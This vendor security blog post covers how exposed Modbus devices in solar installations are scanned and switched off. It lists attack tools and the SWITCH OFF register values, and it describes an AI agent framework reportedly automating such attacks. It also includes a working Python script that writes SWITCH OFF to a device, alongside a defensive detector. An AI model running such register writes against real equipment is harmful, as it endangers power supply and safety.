
Cyberattack on the Sun: Threat Actors Manipulate Solar Panel Systems; Agentic AI Increases the Risk

Millions of homes, businesses, and hospitals depend on solar power, a clean and cost-effective source of renewable energy. Adoption has accelerated worldwide thanks to major government initiatives such as the Inflation Reduction Act (IRA) in the U.S., the Renewable Energy Directive (RED II) in the EU, the Smart Export Guarantee in the UK, and Australia’s Small-scale Renewable Energy Scheme (SRES). As clean energy infrastructure expands, a new exposure is emerging. Many operational technology (OT) systems, including SCADA controllers and string monitoring boxes, still use the decades-old Modbus protocol, which has no authentication and no encryption; when such equipment is reachable from the internet, anyone who can reach it can control it.

Our Cato CTRL and MDR teams have observed large-scale reconnaissance and exploitation attempts targeting Modbus devices, including string monitoring boxes that directly control solar panel output. In such cases, a threat actor with nothing more than an internet connection and a free tool could issue a single register write, “SWITCH OFF,” cutting power on a bright, cloudless day. What once required time, patience, and manual skill can now be scaled and accelerated through automation. With the rise of agentic AI tools, attackers can automate reconnaissance and exploitation, reducing the time needed to execute such an attack from days to minutes and turning the clean energy revolution into the next cyber battlefield.

The Hidden Weak Spot in Solar: Monitoring Boxes

To understand why such reconnaissance and manipulation attempts occur, let’s first dive into some basic terms in the renewable energy sector:

  • Solar Panels (PV Modules): Capture sunlight and generate electricity.
  • Strings: Groups of panels connected together.
  • String Monitoring Box (Combiner Box): A device that collects power from several strings, measures performance, and lets operators send remote commands (like switching sections on/off).
  • SCADA System: The “brain” of the operation. It collects all this information from the monitoring boxes across the farm and provides a single dashboard for operators to:
    • Track power generation.
    • Detect faults or underperforming panels.
    • Send commands back down (like disconnecting a string or rebalancing loads).

Figure 1 illustrates how the string monitoring box connects PV modules to the SCADA system, and at a high level how threat actors target such environments.

From a cyber risk perspective, the monitoring box is the weak point because it speaks Modbus, a protocol with no authentication. A threat actor who can reach it on the network does not need to compromise anything first: they can send commands as if they were the SCADA system, hijacking the control path.

These boxes are critical for efficiency, safety, and uptime. But many solar systems still use Modbus, a decades-old industrial protocol designed for reliability, not security, and we have seen threat actors targeting such devices in the wild.


Figure 1. Diagram of PV modules → strings → string monitoring box → SCADA system.

Why Modbus Is a Hacker’s Playground

Modbus/TCP listens on TCP port 502, which in too many deployments is reachable from the internet. Unlike modern IT protocols, Modbus has:

  • No authentication: Anyone who finds a Modbus device can talk to it.
  • No encryption: Modbus commands and data are sent in plain text.
  • Direct control: Register reads and writes map straight onto device state. Attackers can read registers (such as status and voltage) and write to them (for example, to turn systems on or off).

Example values that, written to the right register on affected solar monitoring boxes, act as control commands:

  • 0xAC00 = SWITCH OFF
  • 0xAC01 = SWITCH ON

The Attacker’s Toolbox: How Modbus Devices Are Probed and Exploited

Unlike complex IT exploits, targeting Modbus is surprisingly simple. Threat actors often use publicly available tools, many of which were originally designed for engineers or researchers, to find and control exposed devices.

Nmap Modbus Scripts

Nmap, the popular network scanner, includes SCADA/Modbus NSE scripts:

  • modbus-discover (bundled with Nmap): Detects whether a host speaks Modbus, reports the device identification it returns, and with the modbus-discover.aggressive argument enumerates every unit ID that answers.
  • modbus-read (third-party, not bundled with Nmap): Reads holding/input registers to fingerprint a device, revealing configuration or status values.
  • modbus-check-unit-id (third-party, not bundled with Nmap): Enumerates valid Unit IDs (essentially device addresses) so attackers can map multi-device setups.

With just these scripts, attackers can identify what kind of OT device is online and which registers return data. Whether a register accepts writes is learned by attempting one (or from the vendor’s register map), which is exactly what the next tools make trivial.

CLI Tools for Register Manipulation

Two widely used utilities – mbtget and mbpoll – let attackers (or engineers) query and modify Modbus registers from the command line.

  • These tools make it trivial to read measurements (voltage, current, fault codes).
  • More dangerously, they allow writing values to registers, e.g., sending a command to switch off a PV string.

Another command-line tool, modbus-cli, goes further:

  • It enables manipulation of coils and registers directly.
  • This is often used in labs for testing, but when exposed online, it gives attackers the same level of access an operator has.

Metasploit Modules

The Metasploit framework ships SCADA/Modbus auxiliary modules, for example:

  • auxiliary/scanner/scada/modbusdetect: Detects Modbus/TCP services across an address range, much like the Nmap script.
  • auxiliary/scanner/scada/modbus_findunitid: Enumerates the unit IDs a device answers for.
  • auxiliary/scanner/scada/modbusclient: Reads and writes coils and registers, which covers both intelligence gathering and the SWITCH OFF write.

Attackers can drive these modules from a resource script to automate large-scale scanning campaigns, fingerprinting hundreds of exposed solar devices in minutes.

Advanced Tools: Impacket & Fuzzers

  • Impacket offers raw packet-crafting classes that can be adapted to build Modbus traffic by hand, although the project itself ships no Modbus module.
  • Modbus fuzzers send malformed or rapid-fire queries to test device resilience. This often reveals misconfigurations or pushes devices into a fail-open state (a reset, or a fallback to insecure defaults).

AI-Powered Attacks on OT: The New Frontier of Industrial Cyber Risk

HexStrike AI, an AI-driven offensive security framework, combines professional security tools with autonomous AI agents to deliver comprehensive security testing capabilities. It has also been reported in use by threat actors, which introduces a new dimension of risk for the renewable energy sector: it can scan, fingerprint, and test industrial systems at a scale and speed that human operators cannot match.

For solar string monitoring boxes that expose Modbus over TCP (port 502), this presents a serious threat as it can perform the following actions at scale through automation:

  • Automated Discovery: Directing tools like Nmap SCADA scripts to quickly identify devices speaking Modbus across wide IP ranges.
  • Enumeration of Registers: By chaining tools like mbpoll or modbus-cli, it can automatically read device registers (voltage, status, unit IDs), building a detailed profile of the monitoring box.
  • Control Commands: Once writable registers are found, it can issue control writes, for example 0xAC00 = SWITCH OFF or 0xAC01 = SWITCH ON, to toggle PV strings.
  • Persistent Manipulation: With retry logic and adaptive decision-making, it could continue to push malicious commands until the device accepts them, potentially overriding operator inputs from the SCADA system.

In short, AI-powered attacks on OT devices allow attackers to behave like a rogue SCADA operator, but from anywhere in the world. Instead of manually probing devices, adversaries can use automation to:

  • Discover exposed ports.
  • Identify vulnerable string monitoring boxes.
  • Exploit Modbus’ lack of authentication to hijack control.

This automation turns what once required skilled manual effort into a machine-speed attack vector. For solar farm operators, it means the time between exposure and compromise could shrink from weeks or days to mere minutes.

Why This Matters for Solar

Because Modbus registers map directly to device controls (string monitoring boxes expose addresses such as 30001, 30002, 40001, 40002; in the conventional Modicon numbering, 3xxxx are read-only input registers and 4xxxx are holding registers that accept writes), attackers with these tools don’t need zero-days. They can simply:

  1. Discover the device on port 502.
  2. Enumerate its registers.
  3. Write values into those registers (e.g., 0xAC00 = SWITCH OFF).

In practice, this means a hacker could remotely toggle PV strings, disable monitoring, or destabilize production, all using free tools available on GitHub or in Kali Linux.
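The register writes described in the Modbus section above and the three steps just listed, as an added worked example that is not code from this post or from Cato: a miniature Modbus/TCP lab in Python. The stand-in “string monitoring box” is started in-process on 127.0.0.1 on an ephemeral port so the script runs offline, and its register map (holding register 0 as the string switch, input registers 0 and 1 as voltage and current times ten) is an assumption for illustration; 0xAC00 and 0xAC01 are the switch values quoted above.

```python
"""Added example (not Cato's code): discover, enumerate and write against a stand-in
string monitoring box.  Register map below is assumed for illustration only."""
import socket
import struct
import threading

SWITCH_OFF, SWITCH_ON = 0xAC00, 0xAC01                     # values quoted in the post
FC_READ_HOLDING, FC_READ_INPUT, FC_WRITE_SINGLE = 0x03, 0x04, 0x06

def mbap(tid, unit, pdu):
    """Prefix a PDU with the MBAP header: transaction id, protocol id (0), length of
    unit id + PDU, unit id.  There is no field for a credential or a MAC."""
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu

def recv_exact(sock, n):
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed")
        buf += chunk
    return bytes(buf)

def recv_adu(sock):
    """Read one Modbus/TCP ADU; return (transaction id, unit id, pdu)."""
    tid, _pid, length, unit = struct.unpack(">HHHB", recv_exact(sock, 7))
    return tid, unit, recv_exact(sock, length - 1)

class FakeMonitoringBox(threading.Thread):
    """Stand-in device: answers FC 03/04/06 for any client, as a real Modbus server does."""
    def __init__(self):
        super().__init__(daemon=True)
        self.holding = {0: SWITCH_ON}       # string switch (assumed register map)
        self.inputs = {0: 6125, 1: 83}      # 612.5 V, 8.3 A (constructed readings)
        self.srv = socket.socket()
        self.srv.bind(("127.0.0.1", 0))     # ephemeral port instead of 502 so it runs unprivileged
        self.srv.listen(1)
        self.port = self.srv.getsockname()[1]

    def run(self):
        conn, _ = self.srv.accept()
        with conn:
            while True:
                try:
                    tid, unit, pdu = recv_adu(conn)
                except ConnectionError:
                    break
                conn.sendall(mbap(tid, unit, self.handle(pdu)))

    def handle(self, pdu):
        fc = pdu[0]
        addr, arg = struct.unpack(">HH", pdu[1:5])          # arg = quantity (reads) or value (write)
        if fc in (FC_READ_HOLDING, FC_READ_INPUT):
            table = self.holding if fc == FC_READ_HOLDING else self.inputs
            vals = [table.get(addr + i, 0) for i in range(arg)]
            return struct.pack(">BB%dH" % arg, fc, 2 * arg, *vals)
        if fc == FC_WRITE_SINGLE:
            self.holding[addr] = arg        # nobody asks who is writing
            return pdu                      # FC 06 success response echoes the request
        return bytes([fc | 0x80, 0x01])     # exception response: illegal function

def read_registers(sock, fc, unit, addr, count):
    sock.sendall(mbap(1, unit, struct.pack(">BHH", fc, addr, count)))
    _, _, pdu = recv_adu(sock)
    if pdu[0] & 0x80:
        raise RuntimeError("Modbus exception code %d" % pdu[1])
    return list(struct.unpack(">%dH" % (pdu[1] // 2), pdu[2:2 + pdu[1]]))

def write_register(sock, unit, addr, value):
    request = struct.pack(">BHH", FC_WRITE_SINGLE, addr, value)
    sock.sendall(mbap(2, unit, request))
    _, _, pdu = recv_adu(sock)
    return pdu == request                   # echo means the device accepted the write

def attack(host, port, unit=1):
    """Step 1: discover (TCP connect to the Modbus port).  Step 2: enumerate (read
    registers).  Step 3: write SWITCH_OFF, then read the switch back to confirm."""
    with socket.create_connection((host, port), timeout=5) as s:
        switch_before = read_registers(s, FC_READ_HOLDING, unit, 0, 1)[0]
        volts, amps = read_registers(s, FC_READ_INPUT, unit, 0, 2)
        accepted = write_register(s, unit, 0, SWITCH_OFF)
        switch_after = read_registers(s, FC_READ_HOLDING, unit, 0, 1)[0]
    return {"switch_before": switch_before, "volts": volts / 10, "amps": amps / 10,
            "write_accepted": accepted, "switch_after": switch_after}

def demo():
    box = FakeMonitoringBox()
    box.start()
    return attack("127.0.0.1", box.port)

if __name__ == "__main__":
    print(demo())   # switch goes from 0xAC01 to 0xAC00 with no credential presented
```

The only thing the device checks is framing: the MBAP header carries a transaction ID, protocol ID, length and unit ID and nothing else, so every client that can open the TCP connection is an operator. Point attack() at a real host on port 502 only in a lab you own.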

What’s at Stake

Leaving a solar monitoring system exposed isn’t a minor IT misconfiguration; it’s an operational risk with real-world consequences:

  • Grid Instability: Turning off parts of a solar farm reduces supply at critical times.
  • Financial Loss: Even short interruptions cost operators thousands in lost production.
  • Safety: Rapid toggling can damage inverters or create fire hazards.

What CISA Recommends

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has repeatedly warned about insecure-by-design OT protocols like Modbus. Best practices include:

  • Avoid exposing OT devices directly to the internet.
  • Segment IT and OT networks.
  • Monitor all traffic, internal and external. We covered this in an earlier blog post:

One Platform, Total OT Protection | Read the blog
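One concrete form of the “monitor all traffic” advice, added here as an example that is not part of this post or of Cato’s platform: a small Python detector over Modbus/TCP payloads. It alerts when a port-502 session involves a host outside the operator’s OT address ranges (the device is exposed), and when a write function code comes from any source other than the allow-listed SCADA server. The addresses, ranges and captured frames are constructed for the demo; the SWITCH OFF / SWITCH ON values are the ones quoted earlier.

```python
"""Added example (not Cato's detection logic): policy checks over Modbus/TCP payloads.
Hosts, ranges and the sample capture are constructed for the demo."""
import ipaddress
import struct

WRITE_FUNCTIONS = {
    0x05: "write single coil", 0x06: "write single register",
    0x0F: "write multiple coils", 0x10: "write multiple registers",
    0x16: "mask write register", 0x17: "read/write multiple registers",
}
SWITCH_VALUES = {0xAC00: "SWITCH OFF", 0xAC01: "SWITCH ON"}   # values quoted in the post

def parse_modbus(payload):
    """Return (unit id, function code, start address, value) or None when the bytes are
    not one well-formed Modbus/TCP ADU (protocol id must be 0, length must match)."""
    if len(payload) < 8:
        return None
    _tid, pid, length, unit = struct.unpack(">HHHB", payload[:7])
    if pid != 0 or length != len(payload) - 6:
        return None
    fc = payload[7]
    addr = value = None
    if fc in (0x03, 0x04, 0x05, 0x06, 0x0F, 0x10) and len(payload) >= 10:
        addr = struct.unpack(">H", payload[8:10])[0]
    if fc in (0x05, 0x06) and len(payload) >= 12:
        value = struct.unpack(">H", payload[10:12])[0]
    return unit, fc, addr, value

def inspect(flows, scada_hosts, ot_networks):
    """flows: iterable of (src_ip, dst_ip, tcp_payload) seen on port 502."""
    nets = [ipaddress.ip_network(n) for n in ot_networks]

    def inside(ip):
        return any(ipaddress.ip_address(ip) in n for n in nets)

    alerts = []
    for src, dst, payload in flows:
        parsed = parse_modbus(payload)
        if parsed is None:          # not Modbus (e.g. a web scanner probing 502): skip here
            continue
        unit, fc, addr, value = parsed
        if not (inside(src) and inside(dst)):
            alerts.append(("HIGH", src, dst, "Modbus session with a host outside the OT ranges"))
        if fc in WRITE_FUNCTIONS and src not in scada_hosts:
            detail = "%s from non-SCADA host, unit=%d addr=%s" % (WRITE_FUNCTIONS[fc], unit, addr)
            if value in SWITCH_VALUES:
                detail += ", value=0x%04X (%s)" % (value, SWITCH_VALUES[value])
            alerts.append(("CRITICAL", src, dst, detail))
    return alerts

def adu(unit, pdu, tid=1):
    """Build a Modbus/TCP frame; used only to construct the sample capture."""
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu

SCADA, BOX, ROGUE_LAPTOP, INTERNET = "10.10.1.5", "10.10.2.20", "10.10.3.9", "203.0.113.7"

SAMPLE_FLOWS = [   # constructed capture
    (SCADA, BOX, adu(1, struct.pack(">BHH", 0x03, 0, 1))),          # SCADA polls the switch
    (SCADA, BOX, adu(1, struct.pack(">BHH", 0x06, 0, 0xAC01))),     # SCADA switches the string on
    (INTERNET, BOX, adu(1, struct.pack(">BHH", 0x06, 0, 0xAC00))),  # internet host writes SWITCH OFF
    (ROGUE_LAPTOP, BOX, adu(1, struct.pack(">BHHB", 0x10, 0, 2, 4)  # internal host, FC 16 write
                            + struct.pack(">HH", 0xAC00, 0xAC00))),
    (INTERNET, BOX, b"GET / HTTP/1.1\r\n\r\n"),                      # web scanner hitting 502
]

def demo():
    return inspect(SAMPLE_FLOWS, scada_hosts={SCADA}, ot_networks=["10.10.0.0/16"])

if __name__ == "__main__":
    for severity, src, dst, detail in demo():
        print(severity, src, "->", dst, detail)
```

In a real sensor the TCP stream has to be reassembled and split into ADUs on the MBAP length field before this check runs, since one segment can carry several requests; the exact-length test here is only valid for the one-request-per-payload capture it is given. The allow-list is the cheap version of the segmentation CISA recommends: a write from anything other than the SCADA host is, by policy, an attack, whether it comes from the internet or from a laptop on the wrong VLAN.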

How Cato Helps Secure Solar and OT Environments

The Cato SASE Platform gives renewable operators the protection Modbus never had:

  • Open Port Alerts: We notify customers proactively when risky ports like 502 are exposed (example in Figure 2).

Figure 2. Alert on an exposed Modbus port 502, rating the risk as high and guiding the customer to close or narrow the access rule.

  • Device Inventory Dashboard: Visibility into every OT device and its communication flows (Figure 3).

Figure 3. Device Inventory Dashboard.

  • Modbus Events Monitoring: Option to drill down and view Modbus events in real time (Figure 4).

Figure 4. Drill-down view of Modbus events.

  • Block the Modbus port and segment OT and IT networks (Figure 5).

Figure 5. Segmenting OT and IT networks.

  • Microsegmentation: Prevents attackers from moving laterally if they get in. (see our previous blog post about it).
  • Threat Hunting: Our Cato MDR team continuously tracks Modbus scans and exploitation attempts in the wild and works directly with our customers when needed.

Conclusion

The renewable energy revolution is too important to be derailed by legacy risks. Yet as long as Modbus ports remain open, hackers have a remote “off switch” to the sun.

With proactive visibility, segmentation, and continuous monitoring, Cato ensures solar power remains a source of resilience, not a target of attack.

The post Cyberattack on the Sun: Threat Actors Manipulate Solar Panel Systems; Agentic AI Increases the Risk appeared first on Cato Networks.
